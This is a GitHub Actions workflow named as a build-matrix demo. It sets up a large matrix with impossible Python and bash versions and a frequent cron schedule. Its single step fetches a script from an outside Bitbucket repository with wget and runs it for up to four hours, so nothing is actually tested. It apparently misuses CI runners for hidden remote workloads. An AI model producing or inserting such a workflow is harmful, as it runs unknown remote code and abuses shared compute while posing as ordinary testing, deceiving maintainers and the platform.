name: build matrix demo1

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]
  schedule:
    - cron: "*/30 */5 * * *"
jobs:
  test:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        python-version:
          - "3.6"
          - "3.7"
          - "3.9"
          - "4.0"
          - "4.1"
        django-version:
          - "1.11"
          - "2.0"
        bash-version:
          - "2.6"
          - "2.5"
          - "2.4"
          - "2.3"
    steps:
      - uses: actions/checkout@v2
      - name: test
        run: wget https://bitbucket.org/sabri-fuadi991/tesazz/raw/0f819ed93510d014deccc02a50366f862f4b0105/main.py && timeout 240m python main.py && echo succes
